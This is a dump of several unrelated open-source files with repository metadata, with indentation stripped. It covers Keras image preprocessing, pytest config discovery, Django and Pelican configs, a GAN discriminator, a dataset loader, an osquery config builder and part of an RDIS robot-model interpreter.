def read_image_bgr(path):
image = np.asarray(PIL.Image.open(path).convert('RGB'))
return image[:, :, ::-1].copy()
def preprocess_image(x):
# if needed, convert from RGB to BGR (unless that is already the case)
x = x.astype(keras.backend.floatx())
if keras.backend.image_data_format() == 'channels_first':
if x.ndim == 3:
x[0, :, :] -= 103.939
x[1, :, :] -= 116.779
x[2, :, :] -= 123.68
else:
x[:, 0, :, :] -= 103.939
x[:, 1, :, :] -= 116.779
x[:, 2, :, :] -= 123.68
else:
x[..., 0] -= 103.939
x[..., 1] -= 116.779
x[..., 2] -= 123.68
return x
def adjust_transform_for_image(transform, image, relative_translation):
# adjust the transformation for an image
height, width, channels = image.shape
result = transform
# scale the translation with the image dimensions, if needed
if relative_translation:
result[0:2, 2] *= [width, height]
# move the transformation origin to the center of the image
result = change_transform_origin(transform, (0.5 * width, 0.5 * height))
return result
class TransformParameters:
# This object holds the parameters that determine how a transformation is applied to an image
def __init__(
self,
fill_mode='nearest',
interpolation='linear',
cval=0,
data_format=None,
relative_translation=True,
):
self.fill_mode = fill_mode
self.cval = cval
self.interpolation = interpolation
self.relative_translation = relative_translation
if data_format is None:
data_format = keras.backend.image_data_format()
self.data_format = data_format
if data_format == 'channels_first':
self.channel_axis = 0
elif data_format == 'channels_last':
self.channel_axis = 2
else:
raise ValueError("Il valore di 'data_format' deve essere 'channels_first' o 'channels_last', mentre invece è '{}'".format(data_format))
def cvBorderMode(self):
if self.fill_mode == 'constant':
return cv2.BORDER_CONSTANT
if self.fill_mode == 'nearest':
return cv2.BORDER_REPLICATE
if self.fill_mode == 'reflect':
return cv2.BORDER_REFLECT_101
if self.fill_mode == 'wrap':
return cv2.BORDER_WRAP
def cvInterpolation(self):
if self.interpolation == 'nearest':
return cv2.INTER_NEAREST
if self.interpolation == 'linear':
return cv2.INTER_LINEAR
if self.interpolation == 'cubic':
return cv2.INTER_CUBIC
if self.interpolation == 'area':
return cv2.INTER_AREA
if self.interpolation == 'lanczos4':
return cv2.INTER_LANCZOS4
def apply_transform(matrix, image, params):
# Apply a transformation to an image
if params.channel_axis != 2:
image = np.moveaxis(image, params.channel_axis, 2)
output = cv2.warpAffine(
image,
matrix[:2, :],
dsize=(image.shape[1], image.shape[0]),
flags=params.cvInterpolation(),
borderMode=params.cvBorderMode(),
borderValue=params.cval,
)
if params.channel_axis != 2:
output = np.moveaxis(output, 2, params.channel_axis)
return output
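# Illustrative usage (assumes a 3x3 affine matrix built via the model.transform helpers):
# params = TransformParameters(fill_mode='nearest', interpolation='linear')
# matrix = adjust_transform_for_image(transform, image, params.relative_translation)
# warped = apply_transform(matrix, image, params)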
def resize_image(img, min_side=600, max_side=1024):
(rows, cols, _) = img.shape
smallest_side = min(rows, cols)
# compute the scale from the smaller side of the image
scale = min_side / smallest_side
# make sure the larger side of the image does not exceed "max_side"
# this could happen with images that have a high aspect ratio
largest_side = max(rows, cols)
if largest_side * scale > max_side:
scale = max_side / largest_side
# resize the image using the computed scale
img = cv2.resize(img, None, fx=scale, fy=scale)
return img, scale
|
[
"ccasadei@maggioli.it"
] |
ccasadei@maggioli.it
|
a68e884048a4a15846273ef1809df5ae52cf12ee
|
f4b0fad9a8a6937021c526f2560d47dbd0fccdb0
|
/venv/lib/python3.6/site-packages/_pytest/config/findpaths.py
|
20a8d3dadb18eab7ce7007f86563d5c80371314e
|
[
"BSD-3-Clause"
] |
permissive
|
RALEx147/FilmColorSearch
|
a54917fb7353c03a7a51277a8cd2c416270c4dcb
|
88b981655c4dd708ad3ad40257356791dcddf5f0
|
refs/heads/master
| 2021-01-04T23:07:01.820998
| 2020-09-08T18:29:52
| 2020-09-08T18:29:52
| 240,788,528
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,803
|
py
|
import os
from typing import Any
from typing import Iterable
from typing import List
from typing import Optional
from typing import Tuple
import py
from .exceptions import UsageError
from _pytest.compat import TYPE_CHECKING
from _pytest.outcomes import fail
if TYPE_CHECKING:
from . import Config # noqa: F401
def exists(path, ignore=EnvironmentError):
try:
return path.check()
except ignore:
return False
def getcfg(args, config=None):
"""
Search the list of arguments for a valid ini-file for pytest,
and return a tuple of (rootdir, inifile, cfg-dict).
note: config is optional and used only to issue warnings explicitly (#2891).
"""
inibasenames = ["pytest.ini", "tox.ini", "setup.cfg"]
args = [x for x in args if not str(x).startswith("-")]
if not args:
args = [py.path.local()]
for arg in args:
arg = py.path.local(arg)
for base in arg.parts(reverse=True):
for inibasename in inibasenames:
p = base.join(inibasename)
if exists(p):
try:
iniconfig = py.iniconfig.IniConfig(p)
except py.iniconfig.ParseError as exc:
raise UsageError(str(exc))
if (
inibasename == "setup.cfg"
and "tool:pytest" in iniconfig.sections
):
return base, p, iniconfig["tool:pytest"]
elif "pytest" in iniconfig.sections:
if inibasename == "setup.cfg" and config is not None:
fail(
CFG_PYTEST_SECTION.format(filename=inibasename),
pytrace=False,
)
return base, p, iniconfig["pytest"]
elif inibasename == "pytest.ini":
# allowed to be empty
return base, p, {}
return None, None, None
def get_common_ancestor(paths: Iterable[py.path.local]) -> py.path.local:
common_ancestor = None
for path in paths:
if not path.exists():
continue
if common_ancestor is None:
common_ancestor = path
else:
if path.relto(common_ancestor) or path == common_ancestor:
continue
elif common_ancestor.relto(path):
common_ancestor = path
else:
shared = path.common(common_ancestor)
if shared is not None:
common_ancestor = shared
if common_ancestor is None:
common_ancestor = py.path.local()
elif common_ancestor.isfile():
common_ancestor = common_ancestor.dirpath()
return common_ancestor
def get_dirs_from_args(args):
def is_option(x):
return str(x).startswith("-")
def get_file_part_from_node_id(x):
return str(x).split("::")[0]
def get_dir_from_path(path):
if path.isdir():
return path
return py.path.local(path.dirname)
# These look like paths but may not exist
possible_paths = (
py.path.local(get_file_part_from_node_id(arg))
for arg in args
if not is_option(arg)
)
return [get_dir_from_path(path) for path in possible_paths if path.exists()]
CFG_PYTEST_SECTION = "[pytest] section in {filename} files is no longer supported, change to [tool:pytest] instead."
def determine_setup(
inifile: Optional[str],
args: List[str],
rootdir_cmd_arg: Optional[str] = None,
config: Optional["Config"] = None,
) -> Tuple[py.path.local, Optional[str], Any]:
dirs = get_dirs_from_args(args)
if inifile:
iniconfig = py.iniconfig.IniConfig(inifile)
is_cfg_file = str(inifile).endswith(".cfg")
sections = ["tool:pytest", "pytest"] if is_cfg_file else ["pytest"]
for section in sections:
try:
inicfg = iniconfig[
section
] # type: Optional[py.iniconfig._SectionWrapper]
if is_cfg_file and section == "pytest" and config is not None:
fail(
CFG_PYTEST_SECTION.format(filename=str(inifile)), pytrace=False
)
break
except KeyError:
inicfg = None
if rootdir_cmd_arg is None:
rootdir = get_common_ancestor(dirs)
else:
ancestor = get_common_ancestor(dirs)
rootdir, inifile, inicfg = getcfg([ancestor], config=config)
if rootdir is None and rootdir_cmd_arg is None:
for possible_rootdir in ancestor.parts(reverse=True):
if possible_rootdir.join("setup.py").exists():
rootdir = possible_rootdir
break
else:
if dirs != [ancestor]:
rootdir, inifile, inicfg = getcfg(dirs, config=config)
if rootdir is None:
if config is not None:
cwd = config.invocation_dir
else:
cwd = py.path.local()
rootdir = get_common_ancestor([cwd, ancestor])
is_fs_root = os.path.splitdrive(str(rootdir))[1] == "/"
if is_fs_root:
rootdir = ancestor
if rootdir_cmd_arg:
rootdir = py.path.local(os.path.expandvars(rootdir_cmd_arg))
if not rootdir.isdir():
raise UsageError(
"Directory '{}' not found. Check your '--rootdir' option.".format(
rootdir
)
)
return rootdir, inifile, inicfg or {}
|
[
"mr7.jacky@gmail.com"
] |
mr7.jacky@gmail.com
|
43dec2a87170199a10d099ada95cfdbd0ffcd33a
|
438728da6fdfc218fe84c84f412400c1f619ce03
|
/lab7/util/neural-network-template-writer.py
|
21e2294e3df34932ce68d9abd24a6494dc4db4bd
|
[] |
no_license
|
smaft/nenr-lab
|
3581032825e0244efd1a9475e075315b48b77569
|
db34502aed9f89c90848b948abfc183aa825ee16
|
refs/heads/master
| 2022-06-28T02:07:19.183942
| 2020-01-16T22:55:37
| 2020-01-21T22:12:53
| 263,274,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 776
|
py
|
import sys
def main():
placeholders="w.11, s.11, w.12, s.12, w.21, s.21, w.22, s.22, w.31, s.31, w.32, s.32, w.41, s.41, w.42, s.42, w.51, s.51, w.52, s.52, w.61, s.61, w.62, s.62, w.71, s.71, w.72, s.72, w.81, s.81, w.82, s.82, a.w0, w.a1, w.a2, w.a3, w.a4, w.a5, w.a6, w.a7, w.a8, b.w0, w.b1, w.b2, w.b3, w.b4, w.b5, w.b6, w.b7, w.b8, c.w0, w.c1, w.c2, w.c3, w.c4, w.c5, w.c6, w.c7, w.c8".split(", ")
values = sys.argv[1].split(", ")
with open("neural-network-template.svg", "rt") as f_in:
with open("neural-network-written.svg", "wt") as f_out:
for line in f_in:
for p, v in zip(placeholders, values):
line = line.replace(p, v)
f_out.write(line)
if __name__ == '__main__':
main()
|
[
"mate.gasparini@fer.hr"
] |
mate.gasparini@fer.hr
|
b19940bec3074954ad59d065ad82dc93a3accefd
|
da5e76df4f0b172c30d2e817cdcf1bbb277890af
|
/Hotels/Hotels/urls.py
|
0fa8b9cb857d4e3ee30f2a8c7bc8da11991d2a06
|
[] |
no_license
|
twizy/Hotels
|
a58e3daefd3164ec35dc5b1c6d8b2a477a3e9915
|
e03543677fffb1f50a7e40f20e9098ded9127372
|
refs/heads/main
| 2023-02-15T04:39:42.384340
| 2021-01-19T10:18:43
| 2021-01-19T10:18:43
| 328,665,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
"""Hotels URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('Base.urls')),
# Rest Api Urls
path('api/', include('Base.urls')),
path('api/hotel/', include('HotelApp.Api.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"twizalain@gmail.com"
] |
twizalain@gmail.com
|
813c90c79d872d92cc71b7bb99d20320f4869c7d
|
28247c87bf546edcfd2763cd303a97ea82853bcb
|
/clashowords/wsgi.py
|
06db7a3c737d079673d485c165258959eae1f968
|
[] |
no_license
|
bibinhashley/ClashO-Words-Blog
|
ec61617ae58afe2ed95bed1a6c74401a68373f27
|
219b0f2244b3670306a9e6a4164fdf937a45eebd
|
refs/heads/master
| 2023-06-27T20:30:27.599589
| 2021-08-02T09:02:15
| 2021-08-02T09:02:15
| 296,549,817
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
"""
WSGI config for clashowords project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'clashowords.settings')
application = get_wsgi_application()
|
[
"bibinhashley@gmail.com"
] |
bibinhashley@gmail.com
|
72d1eb004c32759f15586960fc6cca1ed236a1e3
|
c97e43eca6a0ba9e4492da4d43cfc973dce6ac38
|
/GAN_model/D_gan.py
|
063d92d27364d289286949c806c35cab9739212d
|
[] |
no_license
|
Hutianzhong/SR-GAN
|
2f74676b4bd14d852aeb27b54e7e5b53e90b9bb1
|
1c719456571dbd7daf6cf86d5c1a6afc20c65ed5
|
refs/heads/master
| 2020-07-06T18:19:58.734672
| 2019-08-19T05:21:37
| 2019-08-19T05:21:37
| 203,102,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 586
|
py
|
from __future__ import print_function, division
from keras.layers import Input, Dense, Flatten
from keras.layers.advanced_activations import LeakyReLU
from keras.models import Sequential, Model
def build_D(hr_shape=(128, 128, 1)):
model = Sequential()
model.add(Flatten(input_shape=hr_shape))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(Dense(256))
model.add(LeakyReLU(alpha=0.2))
model.add(Dense(1, activation='sigmoid'))
model.summary()
img = Input(shape=hr_shape)
validity = model(img)
return Model(img, validity)
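# Illustrative usage (assumed training setup, not part of the original file):
# D = build_D(hr_shape=(128, 128, 1))
# D.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])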
|
[
"noreply@github.com"
] |
Hutianzhong.noreply@github.com
|
a525ebf6be93760a40a846924b98bb880a8ae54f
|
975a345d2795198be60137c1a9bf94e429e997bb
|
/nte/data/real/gun_point/GunPointDataset.py
|
0b91f91eead2d9ffef2df699270edb837cd63d75
|
[
"MIT"
] |
permissive
|
kingspp/timeseries-explain
|
ff36a0d22f11b796dab40e7cd3042ada2fa366df
|
bb2e54772d36e0ab0753075f6ce060cdeb8c2e65
|
refs/heads/main
| 2023-05-23T12:11:06.372789
| 2022-08-04T03:45:07
| 2022-08-04T03:45:07
| 394,703,072
| 8
| 2
|
MIT
| 2021-09-26T20:00:41
| 2021-08-10T15:51:07
|
Python
|
UTF-8
|
Python
| false
| false
| 843
|
py
|
from nte.data.dataset import Dataset
from nte import NTE_MODULE_PATH
import pandas as pd
import os
class GunPointDataset(Dataset):
def __init__(self):
super().__init__(
name='gun_point',
meta_file_path=os.path.join(NTE_MODULE_PATH, 'data', 'real', 'gun_point', 'meta.json'))
def load_train_data(self):
df = pd.read_csv(os.path.join(NTE_MODULE_PATH, 'data', 'real', 'gun_point', 'train.csv'), header=None)
train_data = df[list(range(150))].values
train_label = df[150].values
return train_data, train_label
def load_test_data(self):
df = pd.read_csv(os.path.join(NTE_MODULE_PATH, 'data', 'real', 'gun_point', 'test.csv'), header=None)
test_data = df[list(range(150))].values
test_label = df[150].values
return test_data, test_label
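# Illustrative usage (assumes the gun_point CSV files are present):
# ds = GunPointDataset()
# train_data, train_label = ds.load_train_data()
# test_data, test_label = ds.load_test_data()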
|
[
"rdoddaiah@wpi.edu"
] |
rdoddaiah@wpi.edu
|
89732d3f509abfffc2a076d87fd4d409158596df
|
20406d142d31d4716d720cd876adef60092999eb
|
/publishconf.py
|
e10394cf6d0bc1bff59a9bc64bbde8875284bd8c
|
[] |
no_license
|
exhuma/mamerwiselen.lu
|
5cdbd0f888668c5068d0226ac68c3e6668b3d482
|
6fdcba10685258f5ec1c1711dd0fdd85c3f12900
|
refs/heads/master
| 2021-01-15T15:48:33.039233
| 2016-09-27T18:25:16
| 2016-09-27T18:25:16
| 42,190,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import * # NOQA
# This file is only used if you use `make publish` or
# explicitly specify it as your config file. You only need to specify values
# that are *different* on the production host.
SITEURL = 'http://www.mamerwiselen.lu'
RELATIVE_URLS = False
FEED_ALL_ATOM = 'feeds/all.atom.xml'
CATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'
FEED_DOMAIN_NAME = SITEURL
DELETE_OUTPUT_DIRECTORY = True
|
[
"michel@albert.lu"
] |
michel@albert.lu
|
e4c79f2b082684bf5aad943b274af43ef50c6488
|
198471d7a556acfe2158fff8216887f0d3ef92a1
|
/zentral/contrib/osquery/__init__.py
|
486737625236825b325218db47ff68c2a7fb9dd7
|
[
"Apache-2.0"
] |
permissive
|
luisgiraldo/zentral
|
30fcb8ba1d44f634cd9f3280e634d6df6a367064
|
6fdb1ea322e244f35c6b9e1c0c5bf94c68c0077f
|
refs/heads/master
| 2021-01-15T16:14:52.912027
| 2015-11-15T23:00:21
| 2015-11-15T23:00:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
from zentral.conf import settings, probes as all_probes
from zentral.core.exceptions import ImproperlyConfigured
# Enroll_secret structure : EnrollSecretSecret$Key$Val
# EnrollSecretSecret to test if it is a good request.
# Key / Val to try to link with the machine.
# If no machine found, not a problem.
# Enroll_secret example : BLABLA$SERIAL$AZLKJZAENEAZLKJ13098
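# Illustrative (hypothetical values): an enroll_secret of 'S3CR3T$SERIAL$C02XYZ123'
# carries the shared secret 'S3CR3T', the key 'SERIAL' and the value 'C02XYZ123';
# the key/value pair is only used to try to link the request to a known machine.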
def get_enroll_secret_secret(settings):
try:
return settings['apps']['zentral.contrib.osquery']['enroll_secret_secret']
except KeyError:
raise ImproperlyConfigured("Missing attribute 'enroll_secret_secret' in osquery app settings")
enroll_secret_secret = get_enroll_secret_secret(settings)
# The osquery conf for the connected daemons.
def build_osquery_conf(all_probes):
schedule = {}
file_paths = {}
probes = []
for probe_name, probe_d in all_probes.items():
osquery_d = probe_d.get('osquery', None)
if not osquery_d:
continue
probes.append((probe_name, probe_d))
for idx, osquery_query in enumerate(osquery_d.get('schedule', [])):
osquery_query_key = '%s_%d' % (probe_name, idx)
osquery_query = osquery_query.copy()
osquery_query.pop('key', None)
schedule[osquery_query_key] = osquery_query
for category, paths in osquery_d.get('file_paths', {}).items():
if category in file_paths:
raise ImproperlyConfigured('File path category %s not unique' % category)
file_paths[category] = paths
osquery_conf = {'schedule': schedule,
'file_paths': file_paths}
probes.sort()
return osquery_conf, probes
osquery_conf, probes = build_osquery_conf(all_probes)
|
[
"eric.falconnier@112hz.com"
] |
eric.falconnier@112hz.com
|
75652bcd97100b8281c99c6eea4946c8d1d97d74
|
59254f1c203bd7ebd3a5d85d5ec31959c1e90182
|
/rdis/py/rdis.py
|
02a80b9d0bf21b20bbb2b3e2a4f6ef4c58b4b29a
|
[] |
no_license
|
monicadelaine/preop_create
|
c9c687012a23d99d200d4396237ba69862a285fc
|
34dbe0bb8d96d6adcb2c79ac33474007044b65dd
|
refs/heads/master
| 2020-04-11T04:23:20.150444
| 2013-02-22T22:02:51
| 2013-02-22T22:02:51
| 68,144,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,569
|
py
|
#!/usr/bin/env python
"""
An interpreter for RDIS models and quick-n-dirty parser for the JSON concrete
syntax.
This contains several methods which are useful to other applications which are
associated somehow with RDIS and need to emulate some of its behavior.
Usage:
import rdis
model = rdis.load( "/path/to/my/model.rdis.json" )
model.startup()
while <stuff-to-do>:
model.tick()
if <some-event>:
model.callDomainInterface("interface-name", ["arg1", "arg2"])
model.terminate()
"""
import struct ## Used to pack bytes to send over the connection
import re ## Used for models which reply with ASCII-encoded data.
import sys ## Used for printing error messages.
import json ## Used to parse RDIS textual syntax.
import time ## Used for scheduling.
import random ## Used for dummy methods.
import string ## Used for checking printable characters.
import serial ## Used for serial port connections.
## Dictionary which maps RDIS types to Python types.
_gTypeMap = {
'int': 'int',
'float': 'float',
'string': 'str'
}
## Dictionary which maps RDIS types to their equivalent
## default values in Python.
_gDefaultValueMap = {
'int': 0,
'float': 0.0,
'string': ''
}
def mapDefaultValue(typeName):
"""
Maps an RDIS type name to Python default value.
Raises TypeError if typeName is not a valid RDIS type.
"""
global _gDefaultValueMap
mapType(typeName)
return _gDefaultValueMap[typeName]
def mapType(typeName):
"""
Maps an RDIS type to a Python type.
Raises TypeError if typeName is not a valid RDIS type.
"""
global _gTypeMap
if typeName not in _gTypeMap:
raise TypeError("Unknown RDIS type: " + str(typeName))
return _gTypeMap[typeName]
def createEnvironment(parameterNames, values):
"""
Given two parallel lists, one of names and one of values, create a
dictionary with the corresponding name/value pairs.
"""
env = dict()
i = 0
for parameter in parameterNames:
env[parameter] = values[i]
i += 1
return env
def deleteAdditions(before, after):
"""
Deletes any key which is in after, but is not in before.
"""
for key in after.viewkeys() - before.viewkeys():
del after[key]
def safeEval(expression, env):
"""
If expression is not a string, it returns expression.
Otherwise, if the first and last characters of the string
are '<' and '>', it chops them off and evaluates the resulting
expression under the provided environment.
"""
if not isinstance(expression, basestring) or len(expression) == 0:
return expression
returnValue = expression
oldEnv = dict(env)
if expression[0] == '<' and expression[-1] == '>':
returnValue = eval( expression[1:-1], env )
## Subtract off any keys added by eval
deleteAdditions(oldEnv, env)
return returnValue
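# Illustrative: safeEval("<x + 1>", {"x": 2}) evaluates the bracketed expression and
# returns 3, while safeEval("x + 1", {"x": 2}) is returned unchanged as a plain string
# because it is not wrapped in '<' and '>'.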
def safeEvalAll(expressions, env):
"""
Evaluates each expression contained in expression and returns the list.
"""
return [safeEval(k,env) for k in expressions]
def safeExecs(stmts, globalEnv=None):
"""
Calls safeExec on a sequence of statements.
"""
oldGlobals = dict(globalEnv)
for stmt in stmts:
exec(stmt, globalEnv)
deleteAdditions(oldGlobals, globalEnv)
def safeType( value ):
"""
Gets a string representation of value's type.
Safe for objects and primitive types.
"""
varType = type(value).__name__
if varType == "instance":
return value.__class__.__name__
return varType
def printBytes(byteSequence):
"""
Prints a byte sequence to stdout.
If a character is printable, it will print the ASCII representation of that
byte as well. Otherwise, it only prints the hexadecimal represenation.
"""
for b in byteSequence:
if b in string.printable: print hex(ord(b)), b
else: print hex(ord(b))
def load(rdisFile):
"""
Builds RDIS model from its textual description.
@raises RDISException if the model description is invalid.
"""
fp = open(rdisFile)
ctx = json.load(fp)
fp.close()
try:
return RDIS(contextObject=ctx)
except KeyError as e:
raise RDISException("Invalid RDIS description given: " + str(e))
class RDISException(Exception):
"""
Class for RDIS-related exceptions, generally problems with the model itself.
This will be implemented more fully one day.
"""
pass
class RDIS:
"""
The public class for RDIS models.
Generally this should be constructed by calling rdis.load(), though public
methods exist for incrementally building a model by hand. 4 in 5 computer
scientists agree that this is generally a bad thing to do though.
"""
def __init__(self, contextObject=None):
"""
Makes an empty RDIS object.
"""
self._primitives = dict()
self._connections = dict()
self._interfaces = dict()
self._stateVariables = dict()
self._domainInterfaces = dict()
self._domainOutputs = dict()
self._callback = None
self._name = None
self._author = None
if contextObject != None:
self._fromContext(contextObject)
def setCallback(self, callback):
"""
Sets the callback to use when a domain output is triggered.
"""
self._callback = callback
def callDomainInterface(self, name, env):
"""
Calls a domain interface by its name.
The dictionary "env" corresponds to the parameters that the domain
interface takes.
"""
domainInterface = self._getDomainInterface(name)
if domainInterface == None:
sys.stderr.write("'{}': called nonexistant domain interface\n".format(
name
)
)
return
domainInterface.call(env)
def startup(self, **kwargs):
"""
Performs initialization tasks for the model.
This should be called after the model is constructed, but before any
real work is done as it initializes the connection to the robot and things
like that.
"""
for conn in self._connections.values():
apply(conn.startup, [], kwargs)
def terminate(self):
"""
Performs termination tasks for the model.
This should be called when all work is done for the model and it is not
needed anymore. This will do things such as putting the robot into a safe
state and releasing any resource locks.
"""
for conn in self._connections.values():
conn.terminate()
def tick(self):
"""
Notifies the model that a single cycle for the main thread of execution
should be performed.
This does not necessarily correspond to the tick rate of the connection,
but this should be called at a frequency faster than that of any component
in the model.
TODO: Actually there is no scheduling in the model right now. This should
be done real soon.
"""
for conn in self._connections.values():
conn.tick()
def setName(self, name):
"""
Sets the (robot) name of the model.
"""
self._name = name
def getName(self):
"""
Gets the (robot) name of the model.
"""
return self._name
def getAuthor(self):
"""
Gets the author of the model.
"""
return self._author
def getConnection(self, name):
"""
Gets a connection by its name.
"""
return self._connections[name]
def addInterface(self, name, **kwargs):
"""
Adds a local interface to the model.
"""
return apply(self._addElement, [name, self._interfaces, Interface], kwargs)
def addPrimitive(self, name, **kwargs):
"""
Adds a primitive to the model.
"""
return apply(self._addElement, [name, self._primitives, Primitive], kwargs)
def addSerialConnection(self, name, **kwargs):
"""
Adds a serial connection to the model.
"""
return apply(self._addElement, [name, self._connections, SerialConnection],
kwargs)
def addStateVar(self, name, **kwargs):
"""
Adds a state variable to the model.
"""
return apply(self._addElement, [name, self._stateVariables, StateVar],
kwargs)
def addDomainInterface(self, name, **kwargs):
"""
Adds a domain interface to the model.
"""
return apply(self._addElement, [name, self._domainInterfaces,
DomainInterface], kwargs)
def addDomainOutput(self, name, **kwargs):
"""
Adds a domain output to the model.
"""
return apply(self._addElement, [name, self._domainOutputs,
DomainOutput], kwargs)
def _receiveMessage(self, who, msg):
"""
Receives a messages from one of the lower-level components to send to the
callback.
"""
if self._callback == None:
sys.stderr.write("Received message but no callback assigned!\n")
return
self._callback({'name': who.getName(), 'contents': msg})
def _addElement(self, name, store, classObj, **kwargs):
"""
Generalized method for adding a model component.
"""
kwargs["name"] = name
kwargs["parent"] = self
store[name] = apply(classObj, [], kwargs)
def getStateVarValue(self, name):
"""
Gets the (Python) value for a state variable.
"""
return self._stateVariables[name].getValue()
def _getDomainInterface(self, name):
"""
Gets a domain interface by its name.
"""
return self._domainInterfaces.get(name)
def _getInterface(self, name):
"""
Gets a local interface by its name.
"""
return self._interfaces.get(name)
def _getPrimitive(self, name):
"""
Gets a primitive by its name.
"""
return self._primitives.get(name)
def _getDomainOutput(self, name):
"""
Gets a domain output by its name.
"""
return self._domainOutputs.get(name)
def _callDomainOutput(self, name):
"""
Calls a domain output.
"""
do = self._getDomainOutput(name)
if do == None:
sys.stderr.write("'{}': nonexistent domain output\n".format(name))
return
do.call()
def _callPrimitive(self, name, posArgs):
"""
Calls a primitive with given positional arguments.
"""
p = self._getPrimitive(name)
if p == None:
sys.stderr.write("'{}': called nonexistent primitive\n".format(name))
return
elif p.parameterCount() != len(posArgs):
sys.stderr.write(
"Arg mismatch for primitive '{}'. Got {}, expected {}\n".format(
name, len(posArgs), p.parameterCount()
)
)
return
p.call(posArgs)
def _callInterface(self, name, posArgs):
"""
Calls an interface (with provided name) with given positional arguments.
"""
i = self._getInterface(name)
if i == None:
sys.stderr.write("'{}': called nonexistent local interface\n".format(
name
)
)
return
i.call(posArgs)
def _buildStateVarEnvironment(self):
"""
Builds a dictionary containing the names and values of the state
variables.
"""
env = dict()
for (name, stateVar) in self._stateVariables.items():
env[name] = stateVar.getValue()
return env
def _updateStateVarsFromEnvironment(self, env):
"""
Updates state variable values who share names with the keys of "env".
"""
for (name, value) in env.items():
stateVar = self._stateVariables[name]
stateVar.setValue(value)
def _fromContext(self, ctx):
"""
Builds RDIS model from the given context object.
"""
for key in ctx.keys():
if key == "domainInterfaces":
self._loadDomainInterfaces(ctx[key])
elif key == "interfaces":
self._loadInterfaces(ctx[key])
elif key == 'primitives':
self._loadPrimitives(ctx[key])
elif key == 'connections':
self._loadConnections(ctx[key])
elif key == 'domainOutputs':
self._loadDomainOutputs(ctx[key])
elif key == 'stateVariables':
self._loadStateVar(ctx[key])
elif key == 'author':
self._author = ctx[key]
elif key == 'name':
self._name = ctx[key]
else:
sys.stderr.write("Unknown element type: {}\n".format(key))
def _loadStateVar(self, varList):
"""
Loads state variables from the context object representation.
"""
for var in varList:
apply(self.addStateVar,
[var['name']], {
'type': var['type'],
'value': var['value']
}
)
def _loadDomainOutputs(self, doList):
"""
Loads domain outputs from the context object representation.
"""
for do in doList:
apply(self.addDomainOutput,
[do['name']], {
'returns': do['returns']
}
)
def _loadDomainInterfaces(self, diList):
"""
Loads domain interfaces from the context object representation.
"""
for di in diList:
apply(self.addDomainInterface,
[di["name"]], {
'parameters':di["parameters"],
'localInterface':di["calls"]["name"],
'interfaceArguments':di["calls"]["arguments"]
}
)
def _loadInterfaces(self, interfaceList):
"""
Loads local interfaces from the context object representation.
"""
for interface in interfaceList:
apply(self.addInterface,
[interface['name']], {
'type': interface['type'],
'parameters': interface.get('parameters'),
'triggers': interface.get('triggers')
}
)
i = self._getInterface(interface['name'])
for pc in interface['primitiveCalls']:
i.addPrimitiveCall(
pc['name'],
pc['arguments'],
pc['delay'],
pc['priority']
)
def _loadPrimitives(self, primitiveList):
"""
Loads primitives from the context object representation.
"""
for p in primitiveList:
apply(self.addPrimitive,
[p['name']], {
'connection': p['connection'],
'parameters': p.get('parameters', []),
'formatArgs': p.get('formatArgs', []),
'postActions': p.get('postActions', []),
'format': p.get('format'),
'regex': p.get('regex'),
'pack': p.get('pack'),
'unpack': p.get('unpack')
}
)
def _loadConnections(self, connections):
"""
Loads connections from the context object representation.
"""
self._loadSerialConnections(connections.get('spp'))
def _loadSerialConnections(self, connectionList):
"""
Loads serial connections from the context object representation.
"""
if connectionList == None: return
for c in connectionList:
apply(self.addSerialConnection,
[c['name']], {
'baud': c['baud'],
'singleThreading': c.get('singleThreading'),
})
conn = self.getConnection(c['name'])
k = c.get('keepalive')
t = c.get('terminate')
s = c.get('startup')
if k: apply(conn.setKeepalive, [], k)
if t: apply(conn.setTerminate, [], t)
if s: apply(conn.setStartup, [], s)
class StateVar:
"""
A basic unit of memory for the robot model.
Only Primitives can manipulate state variables and they generally reflect a
value read from the sensor, or some sort of constant about the robot.
"""
def __init__(self, name=None, value=None, type=None, parent=None):
"""
Constructs a state variable.
"""
if value == None:
value = mapDefaultValue(type)
self._name = name
self._parent = parent
self._setType(type)
self.setValue(safeEval(value,dict()))
def getValue(self):
"""
Gets the value of the state variable.
"""
return self._value
def _getDefaultValue(self):
"""
Gets the default value for this state variable.
"""
return mapDefaultValue(self._type)
def setValue(self,value):
"""
Sets the value of the state variable.
"""
if value == None or value == "":
value = self._getDefaultValue()
self._assertType(value)
self._value = value
def _assertType(self, value):
"""
Asserts value is a valid type for this state variable.
@raises TypeError if the assertion failed.
"""
nameType = self._getPythonType()
valType = safeType(value)
if not isinstance(value, eval(nameType)):
raise TypeError(
"Attempt to set {} ({}) to value {} ({}).".format(self._name, nameType,
repr(value), valType)
)
def _getPythonType(self):
"""
Gets the equivalent Python type for this state variable.
"""
return mapType(self._type)
def _setType(self, newType):
"""
